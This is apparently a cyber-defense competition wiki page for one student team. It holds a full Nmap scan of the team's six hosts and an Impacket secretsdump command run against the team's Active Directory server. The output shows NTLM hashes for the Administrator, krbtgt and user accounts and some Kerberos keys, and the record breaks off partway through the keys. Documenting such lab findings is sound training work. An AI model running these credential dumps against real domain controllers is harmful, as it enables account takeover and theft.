Team 11 Wiki Page

Signup Login
Team Information
Team Team 11 - DMACC-RootsyRoo logo
Number
Team 11
Name
Team 11 - DMACC-RootsyRoo
IP Range
76.5.61.0/24
Domain
team11.isucdc.com
Current Place
7th
Red Teamer(s)
None
Flag Status
Blue Flags
LTV /etc/ AD C:\Windows\System32\ JD C:\Windows\System32\ NEWS /etc/ WSTN /etc/ WWW /etc/ x-api-key-flag TX Arduino LoRa
Red Flags
WSTN /root/ WWW /root/ AD C:\Users\Administrator\ JD C:\Users\Administrator\ LTV /root/ NEWS /root/
Service Status
AD LDAP
AD RDP
JD RDP
LTV SSH
NEWS SSH
NEWS HTTP
WSTN SSH
WSTN MQTT
WWW SSH
WWW HTTP
Nmap
# Nmap 7.93 scan initiated Sat Dec  6 08:25:11 2025
Nmap scan report for ad.team11.isucdc.com (76.5.61.10)
Host is up (0.017s latency).
rDNS record for 76.5.61.10: fl-76-5-61-10.dhcp.embarqhsd.net
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-06 14:31:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: team11.isucdc.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team11.isucdc.com0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-12-06T14:33:46+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ad.team11.isucdc.com
| Not valid before: 2025-11-04T15:59:51
|_Not valid after:  2026-05-06T15:59:51
| rdp-ntlm-info: 
|   Target_Name: TEAM11
|   NetBIOS_Domain_Name: TEAM11
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team11.isucdc.com
|   DNS_Computer_Name: ad.team11.isucdc.com
|   DNS_Tree_Name: team11.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-12-06T14:33:06+00:00
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49785/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-12-06T14:33:11
|_  start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 76.5.61.40
2   12.00 ms fl-76-5-61-10.dhcp.embarqhsd.net (76.5.61.10)

Nmap scan report for jd.team11.isucdc.com (76.5.61.20)
Host is up (0.013s latency).
rDNS record for 76.5.61.20: fl-76-5-61-20.dhcp.embarqhsd.net
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: DESKTOP-4K2JCUD
|   NetBIOS_Domain_Name: DESKTOP-4K2JCUD
|   NetBIOS_Computer_Name: DESKTOP-4K2JCUD
|   DNS_Domain_Name: DESKTOP-4K2JCUD
|   DNS_Computer_Name: DESKTOP-4K2JCUD
|   Product_Version: 10.0.22621
|_  System_Time: 2025-12-06T14:32:30+00:00
| ssl-cert: Subject: commonName=DESKTOP-4K2JCUD
| Not valid before: 2025-11-06T06:36:16
|_Not valid after:  2026-05-08T06:36:16
|_ssl-date: TLS randomness does not represent time
7680/tcp open  pando-pub?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop

Host script results:
|_clock-skew: -38s

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   10.00 ms fl-76-5-61-20.dhcp.embarqhsd.net (76.5.61.20)

Nmap scan report for ltv.team11.isucdc.com (76.5.61.30)
Host is up (0.010s latency).
rDNS record for 76.5.61.30: fl-76-5-61-30.dhcp.embarqhsd.net
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 0c7c02eb5a9fe29566c11e06cf84cf47 (DSA)
|   2048 453739b58fc6b978ab1e41dd81596ecf (RSA)
|   256 89e9f14ac8d9391f078dd4603c19c4dd (ECDSA)
|_  256 58de7185954051643b9ee99cebfdf838 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): Linux 3.X|4.X (85%), Linksys embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
Aggressive OS guesses: Linksys EA3500 WAP (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 76.5.61.40
2   12.00 ms fl-76-5-61-30.dhcp.embarqhsd.net (76.5.61.30)

Nmap scan report for news.team11.isucdc.com (76.5.61.40)
Host is up (0.015s latency).
rDNS record for 76.5.61.40: fl-76-5-61-40.dhcp.embarqhsd.net
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b963fd0b3453c51f11395a200c0d29fd (RSA)
|   256 f5493b99001426998a90ec8e0ab04cdc (ECDSA)
|_  256 71e302c17070ee2a4b9efefcdeaae4c0 (ED25519)
25/tcp   open  smtp       Postfix smtpd
|_smtp-commands: news.ad.iseage.org, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=news
| Subject Alternative Name: DNS:news
| Not valid before: 2025-08-30T21:36:15
|_Not valid after:  2035-08-28T21:36:15
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http       Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 14:31:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:04.186+00:00","status":404,"error":"Not Found","message":"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 14:31:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:03.919+00:00","status":404,"error":"Not Found","message":"","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 06 Dec 2025 14:31:03 GMT
|     Connection: close
|     {"timestamp":"2025-12-06T14:31:03.990+00:00","status":404,"error":"Not Found","message":"","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 06 Dec 2025 14:31:03 GMT
|     Connection: close
|     HTTP Status 400 </div><div>|     Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 400 

|_    Request
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=12/6%Time=69343E46%P=i686-pc-windows-windows%
SF:r(GetRequest,128,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20A
SF:ccess-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers
SF:\r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2006\x20Dec\x20
SF:2025\x2014:31:03\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\
SF:"2025-12-06T14:31:03\.919\+00:00\",\"status\":404,\"error\":\"Not\x20Fo
SF:und\",\"message\":\"\",\"path\":\"/\"}")%r(HTTPOptions,128,"HTTP/1\.1\x
SF:20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Control-Request-Method\
SF:r\nVary:\x20Access-Control-Request-Headers\r\nContent-Type:\x20applicat
SF:ion/json\r\nDate:\x20Sat,\x2006\x20Dec\x202025\x2014:31:03\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n{\"timestamp\":\"2025-12-06T14:31:03\.990\+00
SF::00\",\"status\":404,\"error\":\"Not\x20Found\",\"message\":\"\",\"path
SF:\":\"/\"}")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x2
SF:0text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\
SF:x20435\r\nDate:\x20Sat,\x2006\x20Dec\x202025\x2014:31:03\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n
SF:itle>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:yle\x20type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}
SF:\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x
SF:20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-siz
SF:e:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20
SF:{height:1px;background-color:#525D76;border:none;}
SF:

HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request

SF:")%r(FourOhFourRequest,177,"HTTP/1\.1\x20404\x20\r\nVary:\x20Ori
SF:gin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Access-Contro
SF:l-Request-Headers\r\nContent-Disposition:\x20inline;filename=f\.txt\r\n
SF:Content-Type:\x20application/json\r\nDate:\x20Sat,\x2006\x20Dec\x202025
SF:\x2014:31:03\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\"202
SF:5-12-06T14:31:04\.186\+00:00\",\"status\":404,\"error\":\"Not\x20Found\
SF:",\"message\":\"\",\"path\":\"/nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}"
SF:);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/6%OT=22%CT=1%CU=40657%PV=N%DS=2%DC=T%G=Y%TM=69343EC
OS:D%P=i686-pc-windows-windows)SEQ(SP=FA%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(CI=Z%II=I)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2NNT11NW7%O4=M4E2S
OS:T11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5
OS:=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%Q=)ECN(R=N)T1(R
OS:=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=%
OS:RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=%R
OS:D=0%Q=)T7(R=Y%DF=Y%T=41%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IP
OS:L=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host:  news.ad.iseage.org; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT     ADDRESS
1   3.00 ms 12.110.254.254
2   6.00 ms fl-76-5-61-40.dhcp.embarqhsd.net (76.5.61.40)

Nmap scan report for wstn.team11.isucdc.com (76.5.61.50)
Host is up (0.0056s latency).
rDNS record for 76.5.61.50: fl-76-5-61-50.dhcp.embarqhsd.net
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.4p1 Debian 5+deb11u5 (protocol 2.0)
| ssh-hostkey: 
|   3072 5a185df5ed7864cc5387404bb610863a (RSA)
|   256 e474126041a3534067eeeadac542e3fd (ECDSA)
|_  256 0799db383afe5abafc5c27c9ea83c3c5 (ED25519)
80/tcp   closed http
1883/tcp open   mqtt
|_mqtt-subscribe: Connection rejected: Not Authorized
8080/tcp closed http-proxy
Device type: general purpose|proxy server
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X (87%), WebSense embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel
Aggressive OS guesses: Linux 4.15 - 5.6 (87%), Linux 5.3 - 5.4 (86%), Linux 2.6.32 (86%), Linux 5.0 - 5.3 (86%), Websense Content Gateway (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
-   Hop 1 is the same as for 76.5.61.40
2   13.00 ms fl-76-5-61-50.dhcp.embarqhsd.net (76.5.61.50)

Nmap scan report for www.team11.isucdc.com (76.5.61.60)
Host is up (0.022s latency).
rDNS record for 76.5.61.60: fl-76-5-61-60.dhcp.embarqhsd.net
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE                  VERSION
22/tcp   open  ssh                      OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 a06a89c7a4b137232d3aa124c3761006 (ECDSA)
|_  256 a87c353ddf2b92072b1ec85a8dd37e0f (ED25519)
80/tcp   open  http                     Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
1883/tcp open  mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/load/bytes/received/5min: 3.41
|     $SYS/broker/load/connections/5min: 0.20
|     $SYS/broker/load/messages/sent/1min: 0.76
|     $SYS/broker/load/connections/1min: 0.76
|     $SYS/broker/load/bytes/sent/1min: 3.04
|     $SYS/broker/store/messages/bytes: 185
|     $SYS/broker/heap/maximum: 42632
|     $SYS/broker/load/sockets/5min: 0.20
|     $SYS/broker/messages/received: 1
|     $SYS/broker/messages/sent: 1
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/load/sockets/15min: 0.07
|     $SYS/broker/load/bytes/sent/5min: 0.76
|     $SYS/broker/bytes/sent: 4
|     $SYS/broker/load/bytes/sent/15min: 0.27
|     $SYS/broker/load/messages/received/15min: 0.07
|     $SYS/broker/load/messages/sent/5min: 0.20
|     $SYS/broker/load/messages/sent/15min: 0.07
|     $SYS/broker/load/messages/received/5min: 0.20
|     $SYS/broker/load/messages/received/1min: 0.76
|     $SYS/broker/load/sockets/1min: 0.63
|     $SYS/broker/clients/connected: 0
|     $SYS/broker/clients/disconnected: 0
|     $SYS/broker/load/bytes/received/1min: 13.69
|     $SYS/broker/uptime: 2478944 seconds
|     $SYS/broker/load/connections/15min: 0.07
|     $SYS/broker/clients/inactive: 0
|     $SYS/broker/load/bytes/received/15min: 1.18
|     $SYS/broker/clients/active: 0
|     $SYS/broker/heap/current: 40664
|_    $SYS/broker/bytes/received: 18
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     content-type: text/html;charset=utf-8
|     x-powered-by: Nuxt
|     Date: Sat, 06 Dec 2025 14:35:47 GMT
|     Connection: close
|     @layer base {</div><div>|     :root {</div><div>|     --ui-color-primary-50: var(--color-green-50, oklch(98.2% 0.018 155.826));</div><div>|     --ui-color-primary-100: var(--color-green-100, oklch(96.2% 0.044 156.743));</div><div>|     --ui-color-primary-200: var(--color-green-200, oklch(92.5% 0.084 155.995));</div><div>|     --ui-color-primary-300: var(--color-green-300, oklch(87.1% 0.15 154.449));</div><div>|     --ui-color-primary-400: var(--color-green-400, oklch(79.2% 0.209 151.711));</div><div>|     --ui-color-primary-500: var(--color-green-500, oklch(72.3% 0.219 149.579));</div><div>|     --ui-color-primary-600: var(--color-green-600, oklch(62.7% 0.194 149.214));</div><div>|     --ui-color-primary-700: var(--color-green-700, oklch(</div><div>|   Help, NCP: </div><div>|     HTTP/1.1 400 Bad Request</div><div>|_    Connection: close</div><div>8080/tcp open  http                     Golang net/http server (Go-IPFS json-rpc or InfluxDB API)</div><div>|_http-open-proxy: Proxy might be redirecting requests</div><div>|_http-title: Site doesn't have a title (text/plain; charset=utf-8).</div><div>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <a target="_blank" rel="nofollow" href="https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service</a> :</div><div>SF-Port3000-TCP:V=7.93%I=7%D=12/6%Time=69343F87%P=i686-pc-windows-windows%</div><div>SF:r(GetRequest,30D4,"HTTP/1\.1\x20200\x20OK\r\ncontent-type:\x20text/html</div><div>SF:;charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20Sat,\x2006\x20Dec\x</div><div>SF:202025\x2014:35:47\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20h</div><div>SF:tml><html><head><meta\x20charset=\"utf-8\"><meta\x20name=\"viewport\"\x</div><div>SF:20content=\"width=device-width,\x20initial-scale=1\"><style\x20id=\"nux</div><div>SF:t-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{\n\x20\x20--ui-col</div><div>SF:or-primary-50:\x20var\(--color-green-50,\x20oklch\(98\.2%\x200\.018\x20</div><div>SF:155\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var\(--color-green-10</div><div>SF:0,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\x20--ui-color-prim</div><div>SF:ary-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\x200\.084\x20155\.</div><div>SF:995\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--color-green-300,\x2</div><div>SF:0oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--ui-color-primary-40</div><div>SF:0:\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.209\x20151\.711\)\</div><div>SF:);\n\x20\x20--ui-color-primary-500:\x20var\(--color-green-500,\x20oklch</div><div>SF:\(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-color-primary-600:\x2</div><div>SF:0var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x20149\.214\)\);\n\</div><div>SF:x20\x20--ui-color-primary-700:\x20var\(--color-green-700,\x20oklch\(")%</div><div>SF:r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r</div><div>SF:\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x2</div><div>SF:0close\r\n\r\n")%r(HTTPOptions,30D4,"HTTP/1\.1\x20200\x20OK\r\ncontent-</div><div>SF:type:\x20text/html;charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20S</div><div>SF:at,\x2006\x20Dec\x202025\x2014:35:47\x20GMT\r\nConnection:\x20close\r\n</div><div>SF:\r\n<!DOCTYPE\x20html><html><head><meta\x20charset=\"utf-8\"><meta\x20n</div><div>SF:ame=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\"></div><div>SF:<style\x20id=\"nuxt-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{</div><div>SF:\n\x20\x20--ui-color-primary-50:\x20var\(--color-green-50,\x20oklch\(98</div><div>SF:\.2%\x200\.018\x20155\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var</div><div>SF:\(--color-green-100,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\</div><div>SF:x20--ui-color-primary-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\</div><div>SF:x200\.084\x20155\.995\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--c</div><div>SF:olor-green-300,\x20oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--u</div><div>SF:i-color-primary-400:\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.</div><div>SF:209\x20151\.711\)\);\n\x20\x20--ui-color-primary-500:\x20var\(--color-g</div><div>SF:reen-500,\x20oklch\(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-col</div><div>SF:or-primary-600:\x20var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x</div><div>SF:20149\.214\)\);\n\x20\x20--ui-color-primary-700:\x20var\(--color-green-</div><div>SF:700,\x20oklch\(");</div><div>No exact OS matches for host (If you know what OS is running on it, see <a target="_blank" rel="nofollow" href="https://nmap.org/submit/">https://nmap.org/submit/</a> ).</div><div>TCP/IP fingerprint:</div><div>OS:SCAN(V=7.93%E=4%D=12/6%OT=22%CT=1%CU=37371%PV=N%DS=2%DC=T%G=Y%TM=69343F9</div><div>OS:D%P=i686-pc-windows-windows)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A</div><div>OS:)SEQ(CI=Z%II=I)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2NNT11NW7%O4=M4E2</div><div>OS:ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W</div><div>OS:5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%Q=)ECN(R=N)T1(</div><div>OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=</div><div>OS:%RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y</div><div>OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=41%W=0%S=A%A=S%F=AR%O=%</div><div>OS:RD=0%Q=)T7(R=Y%DF=Y%T=41%W=0%S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%I</div><div>OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)</div><div><br></div><div>Network Distance: 2 hops</div><div>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</div><div><br></div><div>TRACEROUTE (using port 21/tcp)</div><div>HOP RTT      ADDRESS</div><div>-   Hop 1 is the same as for 76.5.61.40</div><div>2   12.00 ms fl-76-5-61-60.dhcp.embarqhsd.net (76.5.61.60)</div><div><br></div><div>OS and Service detection performed. Please report any incorrect results at <a target="_blank" rel="nofollow" href="https://nmap.org/submit/">https://nmap.org/submit/</a> .</div><div># Nmap done at Sat Dec  6 08:37:17 2025 -- 6 IP addresses (6 hosts up) scanned in 726.68 seconds</div><div><br></div>
Notable Vulnerabilities
./secretsdump.py 'AD$'@ad.team11.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:729a208896a0ea14438446c64754f596:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:13aba1e60e43d3db00245de7751fa120:::
cdc:1000:aad3b435b51404eeaad3b435b51404ee:ed90f06b26e1ae3eeaa45eb98d7e4cd2:::
Richard:1001:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
david.ward:1109:aad3b435b51404eeaad3b435b51404ee:9b1ab38c97cd346a11a0e95dccfa2541:::
matthew.hansen:1110:aad3b435b51404eeaad3b435b51404ee:11d57485f0fcdd6d883cc06814ab51f2:::
jeffrey.harper:1111:aad3b435b51404eeaad3b435b51404ee:c92522f48f8b46dfbe6106b476075b9e:::
ricardo.peterson:1112:aad3b435b51404eeaad3b435b51404ee:f62c9dacda8f6a4329072deaa3d82e02:::
alison.taylor:1113:aad3b435b51404eeaad3b435b51404ee:55fc62ae96ab5bcf671707c60e059de2:::
nicole.galvan:1114:aad3b435b51404eeaad3b435b51404ee:4b6b8cce58591bb8029a875d4eb81432:::
lance.hickman:1115:aad3b435b51404eeaad3b435b51404ee:32fa8d55503c31ea8b22bd4a85a27cc1:::
brad.chapman:1116:aad3b435b51404eeaad3b435b51404ee:2a9e645994252b382941d93d30bd1df3:::
rachel.johnson:1117:aad3b435b51404eeaad3b435b51404ee:f9d5bbf2a7f6944dee88b52ce42b9117:::
brenda.klein:1118:aad3b435b51404eeaad3b435b51404ee:44a9393a09b841a2ead5b77284968a73:::
sharon.hill:1119:aad3b435b51404eeaad3b435b51404ee:46cad2bbbe63b0c4c53839b938a50f79:::
taco:1124:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
AD$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NEWS$:1120:aad3b435b51404eeaad3b435b51404ee:8164032d9bc4b0bd4e57862b4f120808:::
WSTN$:1121:aad3b435b51404eeaad3b435b51404ee:4d30e04c6ab7f0baaf50a77ec8b2d2eb:::
WWW$:1122:aad3b435b51404eeaad3b435b51404ee:85996e79ca1b2291caac2afb07368840:::
LTV$:1123:aad3b435b51404eeaad3b435b51404ee:2dbbc43d74c588a27538bd2fb6f3c9a7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:090330f11a835dfd9e8182fd3121d70a8871fef37bb88f76d4047fac4d5f5e0e
Administrator:aes128-cts-hmac-sha1-96:e06cb8eab4709a10a6d61e770bce8e0f
Administrator:des-cbc-md5:8a62e02aad13d916
krbtgt:aes256-cts-hmac-sha1-96:d8ff8c34812a1f36179e88fd79be339f091ee785f834fb164054b63de4724fac
krbtgt:aes128-cts-hmac-sha1-96:41f3df64494138d10eeb993de106e7e9
krbtgt:des-cbc-md5:763bb68cb95d25f1
cdc:aes256-cts-hmac-sha1-96:7fab75efb1eae6be714dc83a64fe49bb28921594d9d41409f03f07b16385b6e7
cdc:aes128-cts-hmac-sha1-96:55b68fd997f2f5438a5ab74d2d0b11aa
cdc:des-cbc-md5:346807f7d3b3a775
Richard:aes256-cts-hmac-sha1-96:b536c05bf30f8d05e9399614768549891671825b79fd54199d9db42a27518503
Richard:aes128-cts-hmac-sha1-96:102822a5bde8bbeab32b628bc3bee108
Richard:des-cbc-md5:26703797d96e7f5d
david.ward:aes256-cts-hmac-sha1-96:9257827eef6a4fa0a0916d1a8b9ac7bd5c9fbf5f89e35376e2dab44a6a427a1c
david.ward:aes128-cts-hmac-sha1-96:58f3d5f7dda50e48611563a488525cd4
david.ward:des-cbc-md5:19b902e3cb76fb01
matthew.hansen:aes256-cts-hmac-sha1-96:6bac0d4f659af7ad86906782e06159a8ad140aa1a7c8aa87bf3011df8fdbbf52
matthew.hansen:aes128-cts-hmac-sha1-96:9cdd7408ac26a45d9e7913d1fb46a2bd
matthew.hansen:des-cbc-md5:fbf885c845d02cc4
jeffrey.harper:aes256-cts-hmac-sha1-96:484c4c29417449bdf1609aad48d02b615ceeebb2d16b73454b707e9456d39f1d
jeffrey.harper:aes128-cts-hmac-sha1-96:58e3845853e50800e5ea69d1bb91939d
jeffrey.harper:des-cbc-md5:9e2fba67a2014626
